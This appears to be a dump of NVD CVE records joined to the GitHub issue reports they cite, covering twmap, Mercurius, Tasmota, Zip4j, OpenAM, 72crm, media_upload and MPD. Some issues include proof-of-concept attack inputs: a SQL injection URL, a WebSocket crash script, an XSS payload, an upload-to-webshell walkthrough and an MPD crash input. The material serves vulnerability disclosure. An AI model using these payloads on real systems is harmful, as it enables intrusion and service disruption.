5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/happyman/twmap/commit/babbec79b3fa4efb3bd581ea68af0528d11bba0c" }, { "source": "cna@vuldb.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/happyman/twmap/issues/42" }, { "source": "cna@vuldb.com", "tags": [ "Release Notes" ], "url": "https://github.com/happyman/twmap/releases/tag/v2.9_v4.31" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.217645" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.217645" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/happyman/twmap/commit/babbec79b3fa4efb3bd581ea68af0528d11bba0c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/happyman/twmap/issues/42" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/happyman/twmap/releases/tag/v2.9_v4.31" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.217645" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.217645" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:twmap_project:twmap:*:*:*:*:*:*:*:*", "matchCriteriaId": "C8AFFFDD-BFEC-4A4A-8E7F-E3661F97AFB6", "versionEndExcluding": "2.91_4.31", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/happyman/twmap/issues/42
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "happyman", "twmap" ]
In the pointdata2.php file, you can use the GET parameter "id" to execute your own SQL statements. An example exploit is: /twmap3/data/ajaxCRUD/pointdata2.php?id=1%20OR%201=1 The problem can be solved by first escaping the parameter (line 12): $id = mysqli_real_escape_string ($mysqliConn, $_GET ['id']); In addition, the parameter must then be put into a string environment in the query (line 22): $sql. = "where id = '$id'"; After that, the $id parameter can no longer be misused for SQL injection attacks. The vulnerability also exists in the ajaxCRUD_old directory
SQL-Injection in pointdata2.php
https://api.github.com/repos/happyman/twmap/issues/42/comments
0
2019-07-09T08:27:48Z
2019-11-01T23:47:10Z
https://github.com/happyman/twmap/issues/42
465,642,512
42
4,601
CVE-2023-22477
2023-01-09T15:15:11.127
Mercurius is a GraphQL adapter for Fastify. Any users of Mercurius until version 10.5.0 are subjected to a denial of service attack by sending a malformed packet over WebSocket to `/graphql`. This issue was patched in #940. As a workaround, users can disable subscriptions.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mercurius-js/mercurius/issues/939" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mercurius-js/mercurius/pull/940" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mercurius-js/mercurius/security/advisories/GHSA-cm8h-q92v-xcfc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mercurius-js/mercurius/issues/939" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mercurius-js/mercurius/pull/940" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mercurius-js/mercurius/security/advisories/GHSA-cm8h-q92v-xcfc" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mercurius_project:mercurius:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "78357691-02E7-4644-9A54-02DCBE4A6B47", "versionEndExcluding": "8.13.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:mercurius_project:mercurius:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "8FDDE8C9-B8CC-417B-9250-5950C2E48CC0", "versionEndExcluding": "11.5.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "9.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "248" ]
248
https://github.com/mercurius-js/mercurius/issues/939
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mercurius-js", "mercurius" ]
It looks like the server crash in specific conditions. This is related to #908. I thought i solved it with [https://github.com/fastify/fastify-websocket/pull/228](https://github.com/fastify/fastify-websocket/pull/228), but that's not completely true. Before that PR, I was able to crash `mercurius` with: ``` const WebSocket = require('ws'); const ws = new WebSocket('ws://127.0.0.1:1337/graphql'); ws.on('open', function open() { ws._socket.write(Buffer.from([0xa2, 0x00])); }); ``` Now that's happening only specifying the websocket protocol. Given this server `index.js`: ``` const Fastify = require('fastify') const mercurius = require('mercurius') const schema = ` type Query { add(x: Int, y: Int): Int } ` const resolvers = { Query: { add: async (_, { x, y }) => x + y } } async function start() { const fastify = Fastify() fastify.register(mercurius, { schema, resolvers, subscription: true }) await fastify.listen({ port: 1337 }) } start(); ``` I can crash it executing this script `crash_it.js` (see the second parameter of Websocket class): ``` const WebSocket = require('ws'); const ws = new WebSocket('ws://127.0.0.1:1337/graphql', 'graphql-ws'); ws.on('open', function open() { ws._socket.write(Buffer.from([0xa2, 0x00])); }); ```
Invalid WebSocket frame: RSV2 and RSV3 must be clear
https://api.github.com/repos/mercurius-js/mercurius/issues/939/comments
4
2023-01-06T13:29:51Z
2023-01-08T15:54:02Z
https://github.com/mercurius-js/mercurius/issues/939
1,522,596,983
939
4,602
CVE-2021-36603
2023-01-09T21:15:10.537
Cross Site Scripting (XSS) in Tasmota firmware 6.5.0 allows remote attackers to inject JavaScript code via a crafted string in the field "Friendly Name 1".
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/arendst/Tasmota/issues/12221" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/arendst/Tasmota/issues/12221" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:tasmota_project:tasmota:6.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A0D86B53-0AB3-4904-9A41-2A005680F075", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/arendst/Tasmota/issues/12221
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "arendst", "Tasmota" ]
### PROBLEM DESCRIPTION I've identified a Cross-site scripting vulnerability (XSS) in the web interface of Tasmota 6.5.0. Unfortunately, I can not check if the current release is also affected. It would be nice if someone could check this out and give me feedback. ### REQUESTED INFORMATION _Make sure your have performed every step and checked the applicable boxes before submitting your issue. Thank you!_ - [ x] Read the [Contributing Guide and Policy](https://github.com/arendst/Tasmota/blob/development/CONTRIBUTING.md) and [the Code of Conduct](https://github.com/arendst/Tasmota/blob/development/CODE_OF_CONDUCT.md) - [ x] Searched the problem in [issues](https://github.com/arendst/Tasmota/issues) - [x ] Searched the problem in [discussions](https://github.com/arendst/Tasmota/discussions) - [ ] Searched the problem in the [docs](https://tasmota.github.io/docs/FAQ) - [ ] Searched the problem in the [chat](https://discord.gg/Ks2Kzd4) - [ ] Device used (e.g., Sonoff Basic): _____ - [ ] Tasmota binary firmware version number used: _____ - [ ] Pre-compiled - [ ] Self-compiled - [ ] Flashing tools used: _____ - [ ] Provide the output of command: `Backlog Template; Module; GPIO 255`: ```lua Configuration output here: ``` - [ ] If using rules, provide the output of this command: `Backlog Rule1; Rule2; Rule3`: ```lua Rules output here: ``` - [ ] Provide the output of this command: `Status 0`: ```lua STATUS 0 output here: ``` - [ ] Set `weblog` to 4 and then, when you experience your issue, provide the output of the Console log: ```lua Console output here: ``` ### TO REPRODUCE Navigate to "Configuration" - "Configure Other" and insert the following sting in the field "Friendly Name 1": "/><script>alert(1)</script> After that, a JavaScript alert box should appear if the version is vulnerable. ### EXPECTED BEHAVIOUR _A clear and concise description of what you expected to happen._ ### SCREENSHOTS _If applicable, add screenshots to help explain your problem._ ### ADDITIONAL CONTEXT _Add any other context about the problem here._ **(Please, remember to close the issue when the problem has been addressed)**
Cross-site scripting vulnerability
https://api.github.com/repos/arendst/Tasmota/issues/12221/comments
8
2021-05-28T21:21:14Z
2023-12-18T13:20:11Z
https://github.com/arendst/Tasmota/issues/12221
906,076,011
12,221
4,603
CVE-2023-22899
2023-01-10T02:15:09.997
Zip4j through 2.11.2, as used in Threema and other products, does not always check the MAC when decrypting a ZIP archive.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://breakingthe3ma.app" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://breakingthe3ma.app/files/Threema-PST22.pdf" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/srikanth-lingala/zip4j/issues/485" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/srikanth-lingala/zip4j/releases" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://news.ycombinator.com/item?id=34316206" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://threema.ch/en/blog/posts/news-alleged-weaknesses-statement" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://breakingthe3ma.app" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Technical Description", "Third Party Advisory" ], "url": "https://breakingthe3ma.app/files/Threema-PST22.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/srikanth-lingala/zip4j/issues/485" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/srikanth-lingala/zip4j/releases" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://news.ycombinator.com/item?id=34316206" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://threema.ch/en/blog/posts/news-alleged-weaknesses-statement" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zip4j_project:zip4j:*:*:*:*:*:*:*:*", "matchCriteriaId": "EB7DECD0-B6E1-49CD-A63C-47C38DFE663D", "versionEndExcluding": null, "versionEndIncluding": "2.11.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "346" ]
346
https://github.com/srikanth-lingala/zip4j/issues/485
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "srikanth-lingala", "zip4j" ]
In the following document (https://breakingthe3ma.app/files/Threema-PST22.pdf), there is the following comment: “In one of our attacks, we leveraged a vulnerability in a library, Zip4j, used by Threema to create backup zip files. We disclosed our findings to the author of Zip4j on 08.10.2022, proposing a 60-day disclosure period. At the time of writing, the author has yet to acknowledge our email." Can you please comment on CVE-2023-22899 now that this vulnerability has been made public?
Any plans to address CVE-2023-22899
https://api.github.com/repos/srikanth-lingala/zip4j/issues/485/comments
9
2023-01-11T16:25:46Z
2023-01-27T22:53:29Z
https://github.com/srikanth-lingala/zip4j/issues/485
1,529,335,059
485
4,604
CVE-2023-22320
2023-01-10T04:15:10.293
OpenAM Web Policy Agent (OpenAM Consortium Edition) provided by OpenAM Consortium parses URLs improperly, leading to a path traversal vulnerability(CWE-22). Furthermore, a crafted URL may be evaluated incorrectly.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "vultures@jpcert.or.jp", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openam-jp/web-agents/issues/3" }, { "source": "vultures@jpcert.or.jp", "tags": [ "Broken Link" ], "url": "https://jvn.jp/en/vu/JVN91740661/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openam-jp/web-agents/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://jvn.jp/en/vu/JVN91740661/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openam:openam:4.1.0:*:*:*:consortium:*:*:*", "matchCriteriaId": "0D902605-E743-4A84-82FC-C8E8CDF013EE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/openam-jp/web-agents/issues/3
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "openam-jp", "web-agents" ]
# Description OpenAM Web Policy Agent (OpenAM Consortium Edition) provided by OpenAM Consortium contains a path traversal vulnerability (CWE-22) due to flaws in URL parser. Furthermore, a crafted URL may be evaluated incorrectly.
CVE-2023-22320
https://api.github.com/repos/openam-jp/web-agents/issues/3/comments
0
2022-12-14T22:54:54Z
2023-01-10T02:19:12Z
https://github.com/openam-jp/web-agents/issues/3
1,497,528,444
3
4,605
CVE-2022-46610
2023-01-10T14:15:10.587
72crm v9 was discovered to contain an arbitrary file upload vulnerability via the avatar upload function. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/72wukong/72crm-9.0-PHP/issues/36" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/72wukong/72crm-9.0-PHP/issues/36" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:72crm:wukong_crm:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7FD0E887-2558-4A21-B67E-D5E2B722ABEE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/72wukong/72crm-9.0-PHP/issues/36
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "72wukong", "72crm-9.0-PHP" ]
## **Brief of this vulnerability** 72crm v9 has Arbitrary file upload vulnerability Where to upload the avatar ## **Test Environment** - Windows10 - PHP 5.6.9+Apache/2.4.39 ## **Affect version** 72crm v9 ## **Vulnerable Code** application\admin\controller\Users.php line 259 ![image](https://user-images.githubusercontent.com/78201553/205474255-8afaea50-681a-47b2-8184-a2bb3ff930b7.png) After follow-up, it was found that the validate was not set, and the move operation was performed directly, resulting in the ability to upload any file ![image](https://user-images.githubusercontent.com/78201553/181876982-b8aa8629-1527-41db-a719-b98995e33a1c.png) follow-up move function(set filename) line 352: ![image](https://user-images.githubusercontent.com/78201553/181877071-c8f616a9-63c1-4c88-afb4-4c79bbbc1b9d.png) follow up function Generate time-based file names with php as a suffix ![image](https://user-images.githubusercontent.com/78201553/181877151-f3743d4d-e32a-4411-9bf6-efea449654d4.png) then move_uploaded_file with this filename (thinkphp\library\think\File.php line 369) ![image](https://user-images.githubusercontent.com/78201553/181877194-e667e5be-ce4c-43ed-8fb3-b45799fccb54.png) ## **Vulnerability display** First enter the background Click as shown,go to the Enterprise management background ![image](https://user-images.githubusercontent.com/78201553/205474330-e75a3441-f7f5-48fc-a7b3-f1e7dc4ce0fa.png) Click to change avatar ![image](https://user-images.githubusercontent.com/78201553/205474343-e77bc156-925a-4614-9a5e-b0ad0cc3f211.png) Capture the packet and modify the content as follows ![image](https://user-images.githubusercontent.com/78201553/205474357-d98c5a3c-7604-4ba8-bece-1cd9e2c946be.png) Although it is judged as an illegal file, the file has been uploaded successfully, and the file path will be exposed when the debug mode is turned on ![image](https://user-images.githubusercontent.com/78201553/205474499-1fd20fdf-a554-414b-bdfa-2d65dc869710.png) ![image](https://user-images.githubusercontent.com/78201553/205474403-38af0a3a-ba11-4194-8b99-01d35428cae9.png) getshell ![image](https://user-images.githubusercontent.com/78201553/205474418-b3d51c8d-21b1-4217-a230-a8f728036e52.png) note: Even if debug is not turned on, the file name can be blasted out through the file name naming rules ![image](https://user-images.githubusercontent.com/78201553/205474453-500270d2-af81-4135-b173-364f041921d1.png)
72crm v9 has Arbitrary file upload vulnerability in the avatar upload
https://api.github.com/repos/WuKongOpenSource/WukongCRM-9.0-PHP/issues/36/comments
0
2022-12-04T04:28:16Z
2022-12-04T04:32:17Z
https://github.com/WuKongOpenSource/WukongCRM-9.0-PHP/issues/36
1,474,436,518
36
4,606
CVE-2016-15017
2023-01-10T15:15:11.100
A vulnerability has been found in fabarea media_upload on TYPO3 and classified as critical. This vulnerability affects the function getUploadedFileList of the file Classes/Service/UploadFileService.php. The manipulation leads to pathname traversal. Upgrading to version 0.9.0 is able to address this issue. The patch is identified as b25d42a4981072321c1a363311d8ea2a4ac8763a. It is recommended to upgrade the affected component. VDB-217786 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.2, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 5.1, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/fabarea/media_upload/commit/b25d42a4981072321c1a363311d8ea2a4ac8763a" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fabarea/media_upload/issues/6" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fabarea/media_upload/releases/tag/0.9.0" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.217786" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.217786" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/fabarea/media_upload/commit/b25d42a4981072321c1a363311d8ea2a4ac8763a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fabarea/media_upload/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fabarea/media_upload/releases/tag/0.9.0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.217786" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.217786" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ecodev:media_upload:*:*:*:*:*:typo3:*:*", "matchCriteriaId": "9CB8D046-6849-415F-BAED-77F7C226FDE2", "versionEndExcluding": "0.9.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/fabarea/media_upload/issues/6
[ "Third Party Advisory" ]
github.com
[ "fabarea", "media_upload" ]
[SECURITY] Prevent directory traversal
https://api.github.com/repos/fabarea/media_upload/issues/6/comments
0
2016-07-24T17:32:24Z
2016-07-24T20:51:55Z
https://github.com/fabarea/media_upload/issues/6
167,243,954
6
4,607
CVE-2022-46449
2023-01-10T22:15:13.747
An issue in MPD (Music Player Daemon) v0.23.10 allows attackers to cause a Denial of Service (DoS) via a crafted input.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/MusicPlayerDaemon/MPD/issues/1676" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/MusicPlayerDaemon/MPD/issues/1676" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:musicpd:music_player_daemon:0.23.10:*:*:*:*:*:*:*", "matchCriteriaId": "39E47BD9-0063-407A-B32B-B3E250015F23", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/MusicPlayerDaemon/MPD/issues/1676
[ "Exploit", "Third Party Advisory" ]
github.com
[ "MusicPlayerDaemon", "MPD" ]
<!-- See https://www.musicpd.org/help/ --> ## Bug report ### Describe the bug When sending 1. large input and 2. that would trigger the logging of an error on MPD on windows, MPD just segfaults. For instance, sending `listplaylist <400 times 'A'>` swiftly makes MPD segfaults. The error probably stems from https://github.com/MusicPlayerDaemon/MPD/blob/master/src/system/Error.hxx#L94-L95 , and the fact that `snprintf` returns the _number of bytes which would have been written to the final string if enough space had been available_ (https://linux.die.net/man/3/snprintf), and not the number of bytes actually written. I think changing it by a min(return_value, 512) would work and I'd gladly submit a PR if that's the way to go :) It also means that it's possible to write `0x3a20` (which corresponds to the `: ` manually written) about anywhere on the stack, which leads to crashes when it's written to, for instance, rip, but could probably be used for more malicious purposes. ## Expected Behavior MPD does not crash when sent arbitrary big input. ## Actual Behavior MPD crashes when sent big payloads. ## Version ``` PS C:\Users\Paul\Downloads> .\mpd.exe --version Music Player Daemon 0.23.10 (0.23.10) Copyright 2003-2007 Warren Dukes <warren.dukes@gmail.com> Copyright 2008-2021 Max Kellermann <max.kellermann@gmail.com> This is free software; see the source for copying conditions. There is NO warranty; not even MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Database plugins: simple proxy Storage plugins: local nfs curl Decoders plugins: [vorbis] ogg oga [oggflac] ogg oga [flac] flac [opus] opus ogg oga [dsdiff] dff [dsf] dsf [hybrid_dsd] m4a [openmpt] mptm mod s3m xm it 669 amf ams c67 dbm digi dmf dsm dtm far imf ice j2b m15 mdl med mms mt2 mtm nst okt plm psm pt36 ptm sfx sfx2 st26 stk stm stp ult wow gdm mo3 oxm umx xpk ppm mmcmp [modplug] 669 amf ams dbm dfm dsm far it med mdl mod mtm mt2 okt s3m stm ult umx xm [wildmidi] mid [ffmpeg] 16sv 3g2 3gp 4xm 8svx aa3 aac ac3 adx afc aif aifc aiff al alaw amr anim apc ape asf atrac au aud avi avm2 avs bap bfi c93 cak cin cmv cpk daud dct divx dts dv dvd dxa eac3 film flac flc fli fll flx flv g726 gsm gxf iss m1v m2v m2t m2ts m4a m4b m4v mad mj2 mjpeg mjpg mka mkv mlp mm mmf mov mp+ mp1 mp2 mp3 mp4 mpc mpeg mpg mpga mpp mpu mve mvi mxf nc nsv nut nuv oga ogm ogv ogx oma ogg omg opus psp pva qcp qt r3d ra ram rl2 rm rmvb roq rpl rvc shn smk snd sol son spx str swf tak tgi tgq tgv thp ts tsp tta xa xvid uv uv2 vb vid vob voc vp6 vmd wav webm wma wmv wsaud wsvga wv wve [gme] ay gbs gym hes kss nsf nsfe rsn sap spc vgm vgz [pcm] Filters: Tag plugins: Output plugins: null jack httpd snapcast recorder winmm wasapi Encoder plugins: null vorbis opus lame wave flac Input plugins: file curl ffmpeg nfs Playlist plugins: extm3u m3u pls xspf asx rss flac cue embcue Protocols: http:// https:// nfs:// Other features: ipv6 tcp PS C:\Users\Paul\Downloads> ``` ## Configuration ``` music_directory "C:/Users/Paul/Downloads/Music" playlist_directory 